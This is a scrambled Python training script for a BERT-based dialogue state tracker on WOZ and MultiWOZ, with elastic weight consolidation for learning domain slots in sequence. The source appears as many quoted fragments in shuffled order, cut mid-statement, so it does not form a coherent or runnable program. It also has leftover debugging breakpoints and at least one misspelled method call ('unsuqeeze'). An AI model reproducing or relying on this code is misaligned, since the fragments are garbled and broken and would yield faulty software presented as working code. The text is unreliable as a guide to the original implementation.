'%s (id = %d) ' % (label, label_map[i][label])", "for labels in label_list] # Number of labels of all slots #prev_slot_id =", "args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running", "## Dev ## utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples, target_label_list, prev_label_list,", "total_class_acc = 0 total_slot_class_acc = [] nlabels = 0 for sid, slot in", "the label encoder trainable. 
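The data-preprocessing fragments (`class InputExample(object)`, the `self.prev_label = prev_label # trained slots in previous tasks` comment, `class InputFeatures(object)`) reassemble into the two container classes below; the constructor defaults are assumed:

```python
class InputExample(object):
    """A single training/test example for the belief-tracking task."""

    def __init__(self, guid, text_a, text_b=None, label=None, prev_label=None):
        self.guid = guid
        self.text_a = text_a          # user utterance
        self.text_b = text_b          # system response
        self.label = label            # target slots in this training task
        self.prev_label = prev_label  # trained slots in previous tasks


class InputFeatures(object):
    """A single set of features of data."""

    def __init__(self, input_ids, input_len, label_id, prev_label_id):
        self.input_ids = input_ids
        self.input_len = input_len
        self.label_id = label_id
        self.prev_label_id = prev_label_id
```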
\\n\" \"This option is valid only when using label", "# Load a trained model that you have fine-tuned ptr_model = torch.load(output_model_file, map_location=device)", "} out_file_name = 'eval_results' if args.target_slot=='all': out_file_name += '_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\"", "collections.OrderedDict(sorted(ontology.items())) # select slots to train self.target_slot = [] self.prev_slot = [] self.target_slot_idx", "0 if prev_dialogue_idx is None or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id,", "slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot =", "1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if args.local_rank", "args.max_turn_length) all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running analysis *****\")", "dev_loss_slot is None: dev_loss_slot = [ l * num_valid_turn for l in loss_slot]", "type=str, required=True, help=\"Bert pre-trained model selected in the list: bert-base-uncased, \" \"bert-large-uncased, bert-base-cased,", "if not args.do_train and not args.do_eval and not args.do_analyze: raise ValueError(\"At least one", "epochs to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of epochs to allow no", "if args.local_rank == -1 or args.no_cuda: device = torch.device(\"cuda\" if torch.cuda.is_available() and not", "/ args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer is not None: summary_writer.add_scalar(\"Epoch\",", "label_len, slot_token_ids, slot_len) if args.local_rank != -1: try: from apex.parallel import DistributedDataParallel as", "bool(args.local_rank != -1), args.fp16)) if args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid gradient_accumulation_steps parameter: {},", "loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer is not None:", "training: {}\".format( device, n_gpu, bool(args.local_rank != -1), args.fp16)) if args.gradient_accumulation_steps < 1: raise", "0, 0 eval_loss_slot, eval_acc_slot = None, None nb_eval_steps, nb_eval_examples = 0, 0 prev_eval_loss,", "learning rate warmup for. 
\" \"E.g., 0.1 = 10%% of training.\") parser.add_argument(\"--lambda_ewc\", default=0.1,", "in rename_list: new_key = key.replace('rnn.', 'nbt.') ptr_model[new_key] = ptr_model[key] del ptr_model[key] state =", "type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn', type=str, required=True, help=\"nbt type: rnn or transformer", "slot_token_ids, slot_len) if args.local_rank != -1: try: from apex.parallel import DistributedDataParallel as DDP", "nslot = label_ids.size(2) for slot in range(nslot): for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if", "input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc *", "all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running", "key, value in slot_idx.items(): if key == config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot =", "import TensorDataset, DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer", "input_ids += [0] * (max_seq_length - len(input_ids)) # Note: padding idx = 0", "slot == \"pricerange\": slot = \"price range\" if idx in self.target_slot_idx: self.target_slot.append(slot) elif", "transformer or turn\" ) parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not train BERT utterance encoder\") ##", "all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev)", "total_acc_slot]) } out_file_name = 'eval_results' if args.target_slot=='all': out_file_name += '_all' output_eval_file = os.path.join(args.output_dir,", "# select slots to train self.target_slot = [] self.prev_slot = [] self.target_slot_idx =", "type=str, required=True, help=\"The name of the task to train: bert, bert-gru, bert-lstm, \"", "* (max_seq_length - len(input_ids)) # Note: padding idx = 0 assert len(input_ids) ==", "turn['pred']): text += '%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\" % text) writer.write(\"---------- \\n\") logger.info(\"Done analysis: %s\"", "'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = [] for key, value", "precision instead of 32-bit\") parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss scaling to improve fp16 numeric", "= [] for key, value in slot_idx.items(): if key == config.target_slot: target_slot.append(value) else:", "logger.info(\"tokens: %s\" % \" \".join([str(x) for x in tokens])) logger.info(\"input_ids: %s\" % \"", "= convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\", "line[2]: user utterance text_b = line[3] # line[3]: system response label = [", "target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc else: loss_,", "# CUDA setting if args.local_rank == -1 or args.no_cuda: device = torch.device(\"cuda\" if", "= {'eval_loss': 
eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for val in", "training task self.prev_label = prev_label # trained slots in previous tasks class InputFeatures(object):", "EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use CUDA when available\") parser.add_argument(\"--local_rank\", type=int, default=-1,", "== 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt", "acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot,", "class_correct[sid][vid], value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels for sid, slot_acc in", "[PAD]', '') text['label'] = [str(label_list[idx][x]) for idx, x in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x])", "bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output directory where", "= sorted([ int(x) for x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for idx, domain", "logger.info(\" Batch size = %d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run", "None accumulation = False if args.do_train: train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples = processor.get_dev_examples(args.data_dir,", "all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer, device): features = [] for label in", "steps to accumulate before performing a backward/update pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether to use", "'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item())", "global_step) if n_gpu == 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace('", "= None, None prev_nb_dev_examples = 0 for step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch", "torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig == True:", "prev_label_list, max_seq_length, tokenizer, max_turn_length): \"\"\"Loads a data file into a list of `InputBatch`s.\"\"\"", "input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _,", "to train: bert, bert-gru, bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True,", "\"Sequences longer than this will be truncated, and sequences shorter \\n\" \"than this", "input_len[1] = len(tokens_b) + 1 input_ids = tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up to the", "eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss = prev_eval_loss / nb_eval_examples_prev prev_eval_accuracy = prev_eval_accuracy", "no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, 
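The gradient-accumulation fragments scattered through this dump fit together as the usual pattern: the loss is rescaled per micro-batch and the optimizer only steps every k-th batch. A sketch; note the fragments show the original also touches the learning rate inside the stepping branch (the `# modify` comment):

```python
# Average gradients over k micro-batches by scaling each micro-batch loss.
if args.gradient_accumulation_steps > 1:
    loss = loss / args.gradient_accumulation_steps

if args.fp16:
    optimizer.backward(loss)   # apex FP16_Optimizer wraps backward()
else:
    loss.backward()

# Step only on every k-th micro-batch.
if (step + 1) % args.gradient_accumulation_steps == 0:
    optimizer.step()
    optimizer.zero_grad()
    global_step += 1
```

Consistently, `args.train_batch_size` is divided by `args.gradient_accumulation_steps` up front, so the effective batch size stays what the user requested.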
help=\"Proportion of training to perform linear learning", "elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer", "model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc", "for val in total_acc_slot]) } out_file_name = 'eval_results' if args.target_slot=='all': out_file_name += '_all'", "'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for val in total_acc_slot]) }", "\\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric for distance between label embeddings: cosine, euclidean.\")", "x in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as", "open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for slot in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if", "= plt.subplots(nturn, 1, figsize=(50, 10*nturn)) print(\"Slot\", slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()),", "10*nturn)) print(\"Slot\", slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn", "= curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len,", "= csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines = [] for line in reader: if len(line)", "= EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): #", "def _create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates examples for the training and dev sets.\"\"\"", "all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim)", "help=\"Total batch size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size for eval.\")", "text_b self.label = label # Target slots in this training task self.prev_label =", "training epochs to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of epochs to allow", "* prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss = dev_loss / nb_dev_examples", "multi-gpu eval_loss_slot = [0] prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss", "%d) ' % (label, label_map[i][label]) return label_id, label_info features = [] prev_dialogue_idx =", "= tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up to the sequence length. 
input_ids += [0] *", "True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_length: break if len(tokens_a)", "logger.info(\"*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (last_update, best_loss, best_acc))", "total input sequence length after WordPiece tokenization. \\n\" \"Sequences longer than this will", "dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running validation *****\") logger.info(\" Num examples", "1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps) # Set the random seed manually", "euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total", "Validation Acc=%.6f ***\" % (last_update, best_loss, best_acc)) else: logger.info(\"*** Model NOT Updated: Epoch=%d,", "parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run analysis on the test set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set", "improve fp16 numeric stability. Only used when fp16 set to True.\\n\" \"0 (default", "value labels num_labels = [len(labels) for labels in label_list] # Number of labels", "% (sid, slot_acc)) writer.write(\"total class accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis: %s\" %", "loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i], global_step) tr_loss += loss.item() nb_tr_examples +=", "loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean()", "use distributed and fp16 training.\") model = DDP(model) elif n_gpu > 1: model", "ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if not config.target_slot == 'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7',", "[ l * num_valid_turn for l in loss_slot] dev_acc_slot = acc_slot * num_valid_turn", "if args.do_train else None result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([", "or an excluding slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard directory\")", "= convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running training *****\") logger.info(\"", "improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion of training to perform linear learning rate warmup", "prev_eval_loss, prev_eval_accuracy = 0, 0 prev_eval_loss_slot, prev_eval_acc_slot = None, None nb_eval_examples_prev = 0", "= _get_label(example.prev_label, prev_label_list) if ex_index < 5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\" %", "in loss_slot] else: for i, l in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] + l", "'#') continue lines.append(line) return lines class Processor(DataProcessor): \"\"\"Processor for the belief tracking dataset", "prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval()", "if args.do_train: logger.info(\"Training...\") global_step = 0 last_update = None best_loss = None 
####", "eval_accuracy += acc.item() * nb_eval_ex if loss_slot is not None: if eval_loss_slot is", "parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to run eval on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether", "for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig =", "'.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\",", "slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn', type=str,", "size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5,", "class Processor(DataProcessor): \"\"\"Processor for the belief tracking dataset (GLUE version).\"\"\" def __init__(self, config):", "else: raise NotImplementedError() # sorting the ontology according to the alphabetic order of", "help=\"Do not train BERT utterance encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The", "test set.\") args = parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output", "writer.write(\"total class accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis: %s\" % output_eval_incorr_file) print(class_correct) print(class_count)", "epoch, global_step) summary_writer.add_scalar(\"Train/Loss\", loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc,", "= int(example.guid.split('-')[2]) if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx): if prev_turn_idx", "input_len, label_ids, _ = batch if n_gpu == 1: loss_, loss_slot, acc, acc_slot,", "# trained slots in previous tasks class InputFeatures(object): \"\"\"A single set of features", "truncated, and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int,", "already exists and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name =", "nb_tr_examples += input_ids.size(0) nb_tr_steps += 1 if (step + 1) % args.gradient_accumulation_steps ==", "default=4, type=int, help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total batch size", "= TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run prediction for full data eval_sampler = SequentialSampler(eval_data)", "lines class Processor(DataProcessor): \"\"\"Processor for the belief tracking dataset (GLUE version).\"\"\" def __init__(self,", "logger.info(\"Done analysis: %s\" % output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as", "eval_acc_slot = acc_slot * nb_eval_ex else: eval_acc_slot += acc_slot * nb_eval_ex return eval_loss,", "= [] self.prev_slot = [] self.target_slot_idx = sorted([ int(x) for x in 
config.target_slot.split(':')])", "logger.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids])) logger.info(\"input_len: %s\" % \"", "ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology =", "dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for f", "if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory ({}) already exists and", "task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging if not args.do_not_use_tensorboard: summary_writer", "target_label_list # All slot value labels num_labels = [len(labels) for labels in label_list]", "type=float, help=\"The initial learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total number of", "InputExample(object): \"\"\"A single training/test example for simple sequence classification.\"\"\" def __init__(self, guid, text_a,", "optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ###############################################################################", "= %d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run prediction for full", "if drawfig == True: #if (len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2) attn_scores =", "= os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as writer: total_class_acc = 0 total_slot_class_acc =", "= os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file, \"w\") as writer: logger.info(\"***** Eval results", "> len(tokens_b): tokens_a.pop() else: tokens_b.pop() ############################################################################### # Miscellaneous functions ############################################################################### def accuracy(out, labels):", "this data set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab", "from BeliefTrackerSlotQueryMultiSlotEWC import EWC model = BeliefTracker(args, num_labels, device) if args.fp16: model.half() #", "prev_nb_dev_examples if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\",", "writer: logger.info(\"***** Eval results *****\") for key in sorted(result.keys()): logger.info(\" %s = %s\",", "prev_acc_slot * prev_num_valid_turn else: for i, l in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] +", "incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as writer: for dialog in", "Num steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device),", "eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run prediction for full data eval_sampler =", "class for data converters for sequence classification data 
sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets", "acc, _, pred_slot = model(input_ids, input_len, label_ids, 1) nturn = (label_ids[:,:,0].view(-1) != -1).sum().item()", "else: raise ValueError('nbt type should be either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import", "ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc prev_loss, _, prev_acc, prev_acc_slot, _", "random seed manually for reproducibility. random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu > 0: torch.cuda.manual_seed_all(args.seed)", "- 1) assert len(features) % max_turn_length == 0 if prev_dialogue_idx is None or", "torch.nn.DataParallel(model) if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() == 0): eval_examples =", "total_acc_slot[idx] = val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss / nb_tr_steps if", "else \"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu =", "type should be either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC model =", "def __init__(self, config): super(Processor, self).__init__() import json if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\":", "= num_train_steps if args.local_rank != -1: t_total = t_total // torch.distributed.get_world_size() if args.fp16:", "'#' will be replaced with '[SEP]' after tokenization. text_a = line[2] + \"", "else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu = 1 # Initializes the distributed", "optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step() optimizer.zero_grad() global_step += 1 # Perform evaluation on", "% slot.replace(' ','_'), acc_slot[i], global_step) tr_loss += loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps +=", "all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running training *****\")", "slots in this training task self.prev_label = prev_label # trained slots in previous", "state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value embeddings label_token_ids, label_len =", "Load a trained model that you have fine-tuned ptr_model = torch.load(output_model_file, map_location=device) del_list", "acc_slot * num_valid_turn prev_dev_loss_slot = [ l * prev_num_valid_turn for l in prev_loss_slot]", "== True: #if (len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot,", "prev_eval_loss_slot, prev_eval_acc_slot = None, None nb_eval_examples_prev = 0 for input_ids, input_len, label_ids, prev_label_ids", "nbt, rename_list.append(key) for key in del_list: del ptr_model[key] for key in rename_list: new_key", "dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len def", "args.output_dir.split('/')[1] # Tensorboard logging if not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name))", "None or prev_dialogue_index != line[0]: text_a = line[2] text_b = line[3] prev_dialogue_index =", "action='store_true', help=\"Whether not to use CUDA when available\") 
parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for", "in n for nd in no_decay)], 'weight_decay': 0.01, 'lr': args.learning_rate}, {'params': [p for", "optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if args.local_rank !=", "## utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer,", "None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step() optimizer.zero_grad()", "accumulation) def get_test_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\",", "curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is not None) and (prev_dialogue_idx", "input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features)", "utterances all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)", "training.\") model = DDP(model) elif n_gpu > 1: model = torch.nn.DataParallel(model) # Prepare", "loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc =", "model if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot import BeliefTracker if args.task_name.find(\"gru\") == -1 and", "vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct = [[0 for x in range(num_labels[i])] for i", "dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss = round(dev_loss, 6) if last_update is None or dev_loss", "if tokens_b: tokens += tokens_b + [\"[SEP]\"] input_len[1] = len(tokens_b) + 1 input_ids", "label_ids, _ = batch if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _", "= model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_ +", "= %d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) # Run prediction for", "target_slot=target_slot_id) loss_ = loss_.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) loss_ewc = ewc.penalty(model)", "label_list] # Number of labels of all slots #prev_slot_id = processor.prev_slot_idx #target_slot_id =", "Acc=%.6f ***\" % (epoch, dev_loss, dev_acc)) #if epoch > 100 and last_update +", "from BeliefTrackerSlotQueryMultiSlot import BeliefTracker if args.task_name.find(\"gru\") == -1 and args.task_name.find(\"lstm\") == -1: raise", "= prev_dev_acc_slot / prev_nb_dev_examples if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\",", "max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device) all_label_len =", "type=int, help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total batch size for", "prev_dialogue_idx = None all_padding = [0] * max_seq_length 
